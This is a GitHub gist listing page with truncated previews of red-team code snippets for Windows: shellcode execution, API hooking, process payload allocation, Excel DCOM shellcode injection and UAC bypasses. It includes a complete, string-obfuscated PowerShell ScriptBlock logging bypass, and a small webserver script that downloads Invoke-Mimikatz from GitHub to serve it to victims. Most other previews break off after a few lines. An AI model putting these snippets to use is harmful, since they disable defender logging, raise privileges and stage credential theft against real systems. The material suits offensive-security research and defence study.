TheWover
/ EtwpTest.cs
Created
May 6, 2020 22:03
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
TheWover
/ win32_hook.h
Created
April 7, 2020 01:17
— forked from ghorsington/win32_hook.h
EAT and IAT hook
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * EAT-based hooking for x86/x64. | |
| * | |
| * Big thanks to ez (https://github.com/ezdiy/) for making this! | |
| * | |
| * Creates "hooks" by modifying the module's export address table. | |
| * The procedure works in three main parts: | |
| * | |
| * 1. Reading the module's PE file and getting all exported functions. | |
| * 2. Finding the right function to "hook" by simple address lookup |
TheWover
/ autoelevate-1903.txt
Last active
May 20, 2024 16:20
Non-exhaustive list of auto-elevating applications in Windows 10.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reference: https://www.researchgate.net/publication/319454675_Testing_UAC_on_Windows_10 | |
| Get-ChildItem "C:\Windows\System32\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>" | |
| C:\Windows\System32\bthudtask.exe:78: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\changepk.exe:194: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\ComputerDefaults.exe:308: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\dccw.exe:464: <autoElevate>true</autoElevate> |
TheWover
/ Find-Assemblies.ps1
Last active
June 6, 2022 17:53
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Param([parameter(Mandatory=$true, | |
| HelpMessage="Directory to search for .NET Assemblies in.")] | |
| $Directory, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to search recursively.")] | |
| [switch]$Recurse = $false, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to include DLLs in the search.")] | |
| [switch]$DLLs = $false, | |
| [parameter(Mandatory=$false, |
TheWover
/ override.cs
Last active
January 25, 2020 21:09
Forces the abstract subclass's overload to be called. Dis sketch.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /// <summary> | |
| /// Allocate the payload to the target process at a specified address. | |
| /// </summary> | |
| /// <param name="payload">The payload to allocate to the target process.</param> | |
| /// <param name="process">The target process.</param> | |
| /// <param name="address">The address at which to allocate the payload in the target process.</param> | |
| /// <returns>True when allocation was successful. Otherwise, throws relevant exceptions./returns> | |
| public IntPtr Allocate(PayloadType payload, System.Diagnostics.Process process, IntPtr address) | |
| { | |
| //Create the function prototype (signature) for the function we will call in the subclass |
TheWover
/ Testing NtMapViewOfSectionEx range functionality
Created
January 18, 2020 21:48
— forked from s3rb31/Testing NtMapViewOfSectionEx range functionality
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <cstdio> | |
| // credits: s3rb31 | |
| #define STATUS_SUCCESS 0x00000000 | |
| template<typename T> | |
| T GetNTDLLProc(LPCSTR ProcName) | |
| { |
TheWover
/ ScriptBlockLogBypass.ps1
Created
January 2, 2020 19:08
— forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
TheWover
/ server.ps1
Created
December 18, 2019 21:41
— forked from cobbr/server.ps1
Dirty PowerShell Webserver
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
| $Hso = New-Object Net.HttpListener | |
| $Hso.Prefixes.Add("http://+:8080/") | |
| $Hso.Start() | |
| While ($Hso.IsListening) { | |
| $HC = $Hso.GetContext() | |
| $HRes = $HC.Response | |
| $HRes.Headers.Add("Content-Type","text/plain") | |
| If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
| $Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
TheWover
/ Invoke-Excel4DCOM64.ps1
Created
December 14, 2019 14:45
— forked from Philts/Invoke-Excel4DCOM64.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #********************************************************************** | |
| # Invoke-Excel4DCOM64.ps1 | |
| # Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
| # Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason | |
| # Date: 2019/04/21 | |
| # Version: 1.1 | |
| #********************************************************************** | |
| function Invoke-Excel4DCOM | |
| { |
TheWover
/ powershell-uac-always-notify-bypass.ps1
Created
December 4, 2019 19:25
— forked from chryzsh/powershell-uac-always-notify-bypass.ps1
uac bypass for always notify (works on 1903)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $assemblies=( | |
| "System" | |
| ) | |
| $source=@" | |
| using System; | |
| using Microsoft.Win32; | |
| using System.Diagnostics; | |
| namespace Helloworld |